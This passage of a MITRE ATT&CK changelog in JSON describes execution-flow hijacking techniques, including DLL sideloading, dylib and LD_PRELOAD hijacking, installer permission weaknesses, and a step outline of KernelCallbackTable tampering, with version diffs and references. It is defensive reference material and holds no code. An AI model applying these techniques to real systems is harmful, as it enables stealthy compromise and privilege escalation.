                            "DET0479: Detection Strategy for Hijack Execution Flow using the Windows COR_PROFILER."
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 18:11:08.357000+00:00",
                    "modified": "2026-04-15 22:57:22.515000+00:00",
                    "name": "DLL",
                    "description": "Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42)\n\nSpecific ways DLLs are abused by adversaries include:\n\n### DLL Sideloading\nAdversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).\n\nSide-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.\n\nAdversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl)\n\nAdversaries may chain DLL sideloading multiple times to fragment functionality hindering analysis. Adversaries using multiple DLL files can split the loader functions across different DLLs, with a main DLL loading the separated export functions. (Citation: Virus Bulletin) Spreading loader functions across multiple DLLs makes analysis harder, since all files must be collected to fully understand the malware\u2019s behavior.  Another method implements a \u201cloader-for-a-loader\u201d, where a malicious DLL\u2019s sole role is to load a second DLL (or a chain of DLLs) that contain the real payload. (Citation: Sophos)\n\n### DLL Search Order Hijacking\nAdversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42)\n\n### DLL Redirection\nAdversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly)\n\n### Phantom DLL Hijacking\nAdversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike)\n\n### DLL Substitution\nAdversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking)\n\nPrograms that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses.\n\nRemote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading)\n\nIf a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574/001",
                            "external_id": "T1574.001"
                        },
                        {
                            "source_name": "Hijack DLLs CrowdStrike",
                            "description": " falcon.overwatch.team. (2022, December 30). 4 Ways Adversaries Hijack DLLs \u2014 and How CrowdStrike Falcon OverWatch Fights Back. Retrieved January 30, 2025.",
                            "url": "https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/"
                        },
                        {
                            "source_name": "kroll bpl",
                            "description": "Dave Truman. (2024, June 24). Novel Technique Combination Used In IDATLOADER Distribution. Retrieved January 30, 2025.",
                            "url": "https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution"
                        },
                        {
                            "source_name": "Sophos",
                            "description": "Gabor Szappanos. (2023, May 3). A doubled \u201cDragon Breath\u201d adds new air to DLL sideloading attacks. Retrieved October 3, 2025.",
                            "url": "https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/"
                        },
                        {
                            "source_name": "Hexacorn DLL Hijacking",
                            "description": "Hexacorn. (2013, December 8). Beyond good ol\u2019 Run key, Part 5. Retrieved August 14, 2024.",
                            "url": "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/"
                        },
                        {
                            "source_name": "microsoft remote preloading",
                            "description": "Microsoft. (2014, May 13). Microsoft Security Advisory 2269637: Insecure Library Loading Could Allow Remote Code Execution. Retrieved January 30, 2025.",
                            "url": "https://learn.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637"
                        },
                        {
                            "source_name": "Microsoft - manifests/assembly",
                            "description": "Microsoft. (2021, January 7). Manifests. Retrieved January 30, 2025.",
                            "url": "https://learn.microsoft.com/en-us/windows/win32/sbscs/manifests?redirectedfrom=MSDN"
                        },
                        {
                            "source_name": "Microsoft redirection",
                            "description": "Microsoft. (2023, October 12). Dynamic-link library redirection. Retrieved January 30, 2025.",
                            "url": "https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN"
                        },
                        {
                            "source_name": "dll pre load owasp",
                            "description": "OWASP. (n.d.). Binary Planting. Retrieved January 30, 2025.",
                            "url": "https://owasp.org/www-community/attacks/Binary_planting"
                        },
                        {
                            "source_name": "Virus Bulletin",
                            "description": "Suguru Ishimaru, Hajime Yanagishita, Yusuke Niwa. (2023, October 5). Unveiling activities of Tropic Trooper 2023: deep analysis of Xiangoop Loader and EntryShell payload. Retrieved October 3, 2025.",
                            "url": "https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload/"
                        },
                        {
                            "source_name": "unit 42",
                            "description": "Tom Fakterman, Chen Erlich, & Assaf Dahan. (2024, February 22). Intruders in the Library: Exploring DLL Hijacking. Retrieved January 30, 2025.",
                            "url": "https://unit42.paloaltonetworks.com/dll-hijacking-techniques/"
                        },
                        {
                            "source_name": "Wietze Beukema DLL Hijacking",
                            "description": "Wietze Beukema. (2020, June 22). Hijacking DLLs in Windows. Retrieved April 8, 2025.",
                            "url": "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Ami Holeston, CrowdStrike",
                        "Hajime Yanagishita, Macnica, Inc.",
                        "Marina Liang",
                        "Stefan Kanthak",
                        "Suguru Ishimaru, ITOCHU Cyber & Intelligence Inc.",
                        "Travis Smith, Tripwire",
                        "Wietze Beukema @Wietze",
                        "Will Alexander, CrowdStrike",
                        "Yusuke Niwa, ITOCHU Cyber & Intelligence Inc."
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:57:22.515000+00:00\", \"old_value\": \"2025-11-06 17:52:37.747000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1013: Application Developer Guidance",
                            "M1038: Execution Prevention",
                            "M1044: Restrict Library Loading",
                            "M1047: Audit",
                            "M1051: Update Software"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0201: Detection Strategy for Hijack Execution Flow for DLLs"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-16 15:23:30.896000+00:00",
                    "modified": "2026-04-15 22:58:27.104000+00:00",
                    "name": "Dylib Hijacking",
                    "description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\n\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574/004",
                            "external_id": "T1574.004"
                        },
                        {
                            "source_name": "MalwareUnicorn macOS Dylib Injection MachO",
                            "description": "Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021.",
                            "url": "https://malwareunicorn.org/workshops/macos_dylib_injection.html#5"
                        },
                        {
                            "source_name": "Wardle Dylib Hijacking OSX 2015",
                            "description": "Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved March 29, 2021.",
                            "url": "https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf"
                        },
                        {
                            "source_name": "Writing Bad Malware for OSX",
                            "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.",
                            "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf"
                        },
                        {
                            "source_name": "Wardle Dylib Hijack Vulnerable Apps",
                            "description": "Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021.",
                            "url": "https://objective-see.com/blog/blog_0x46.html"
                        },
                        {
                            "source_name": "wardle artofmalware volume1",
                            "description": "Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved November 17, 2024.",
                            "url": "https://taomm.org/vol1/read.html"
                        },
                        {
                            "source_name": "Github EmpireProject HijackScanner",
                            "description": "Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021.",
                            "url": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py"
                        },
                        {
                            "source_name": "Github EmpireProject CreateHijacker Dylib",
                            "description": "Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021.",
                            "url": "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "macOS"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:58:27.104000+00:00\", \"old_value\": \"2025-10-24 17:49:39.243000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}, \"root['external_references'][2]\": {\"source_name\": \"Apple Developer Doco Archive Run-Path\", \"description\": \"Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021.\", \"url\": \"https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0152: Detection Strategy for Hijack Execution Flow: Dylib Hijacking"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 20:09:59.569000+00:00",
                    "modified": "2026-04-15 22:57:21.530000+00:00",
                    "name": "Dynamic Linker Hijacking",
                    "description": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from various environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) Each platform's linker uses an extensive list of environment variables at different points in execution. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions in the original library.(Citation: Baeldung LD_PRELOAD)\n\nHijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. For example, adversaries have used `LD_PRELOAD` to inject a malicious library into every descendant process of the `sshd` daemon, resulting in execution under a legitimate process. When the executing sub-process calls the `execve` function, for example, the malicious library\u2019s `execve` function is executed rather than the system function `execve` contained in the system library on disk. This allows adversaries to [Hide Artifacts](https://attack.mitre.org/techniques/T1564) from detection, as hooking system functions such as `execve` and `readdir` enables malware to scrub its own artifacts from the results of commands such as `ls`, `ldd`, `iptables`, and `dmesg`.(Citation: ESET Ebury Oct 2017)(Citation: Intezer Symbiote 2022)(Citation: Elastic Security Labs Pumakit 2024)\n\nHijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574/006",
                            "external_id": "T1574.006"
                        },
                        {
                            "source_name": "Apple Doco Archive Dynamic Libraries",
                            "description": "Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021.",
                            "url": "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html"
                        },
                        {
                            "source_name": "Baeldung LD_PRELOAD",
                            "description": "baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021.",
                            "url": "https://www.baeldung.com/linux/ld_preload-trick-what-is"
                        },
                        {
                            "source_name": "TheEvilBit DYLD_INSERT_LIBRARIES",
                            "description": "Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020.",
                            "url": "https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/"
                        },
                        {
                            "source_name": "Intezer Symbiote 2022",
                            "description": "Joakim Kennedy and The BlackBerry Threat Research & Intelligence Team. (2022, June 9). Symbiote Deep-Dive: Analysis of a New, Nearly-Impossible-to-Detect Linux Threat. Retrieved March 24, 2025.",
                            "url": "https://intezer.com/blog/research/new-linux-threat-symbiote/"
                        },
                        {
                            "source_name": "Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass",
                            "description": "Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021.",
                            "url": "https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191"
                        },
                        {
                            "source_name": "Man LD.SO",
                            "description": "Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020.",
                            "url": "https://www.man7.org/linux/man-pages/man8/ld.so.8.html"
                        },
                        {
                            "source_name": "Elastic Security Labs Pumakit 2024",
                            "description": "Remco Sprooten and Ruben Groenewoud. (2024, December 11). Declawing PUMAKIT. Retrieved March 24, 2025.",
                            "url": "https://www.elastic.co/security-labs/declawing-pumakit"
                        },
                        {
                            "source_name": "TLDP Shared Libraries",
                            "description": "The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020.",
                            "url": "https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html"
                        },
                        {
                            "source_name": "Timac DYLD_INSERT_LIBRARIES",
                            "description": "Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020.",
                            "url": "https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/"
                        },
                        {
                            "source_name": "ESET Ebury Oct 2017",
                            "description": "Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021.",
                            "url": "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:57:21.530000+00:00\", \"old_value\": \"2025-10-24 17:48:51.810000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1028: Operating System Configuration",
                            "M1038: Execution Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0435: Detection Strategy for Hijack Execution Flow: Dynamic Linker Hijacking"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 11:12:18.558000+00:00",
                    "modified": "2026-04-15 23:02:03.423000+00:00",
                    "name": "Executable Installer File Permissions Weakness",
                    "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the <code>%TEMP%</code> directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574/005",
                            "external_id": "T1574.005"
                        },
                        {
                            "source_name": "mozilla_sec_adv_2012",
                            "description": "Robert Kugler. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.",
                            "url": "https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/"
                        },
                        {
                            "source_name": "Executable Installers are Vulnerable",
                            "description": "Stefan Kanthak. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege. Retrieved December 4, 2014.",
                            "url": "https://seclists.org/fulldisclosure/2015/Dec/34"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Stefan Kanthak",
                        "Travis Smith, Tripwire"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 23:02:03.423000+00:00\", \"old_value\": \"2025-10-24 17:48:56.875000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1047: Audit",
                            "M1052: User Account Control"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0038: Detection Strategy for Hijack Execution Flow using Executable Installer File Permissions Weakness"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-02-25 15:27:44.927000+00:00",
                    "modified": "2026-04-15 23:01:58.951000+00:00",
                    "name": "KernelCallbackTable",
                    "description": "Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)\n\nAn adversary may hijack the execution flow of a process using the <code>KernelCallbackTable</code> by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.\n\nA pointer to the memory address of the <code>KernelCallbackTable</code> can be obtained by locating the PEB (ex: via a call to the <code>NtQueryInformationProcess()</code> [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the <code>KernelCallbackTable</code> can be duplicated, and a function in the table (e.g., <code>fnCOPYDATA</code>) set to the address of a malicious payload (ex: via <code>WriteProcessMemory()</code>). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)\n\nThe tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the <code>KernelCallbackTable</code> may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the <code>KernelCallbackTable</code> to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574/013",
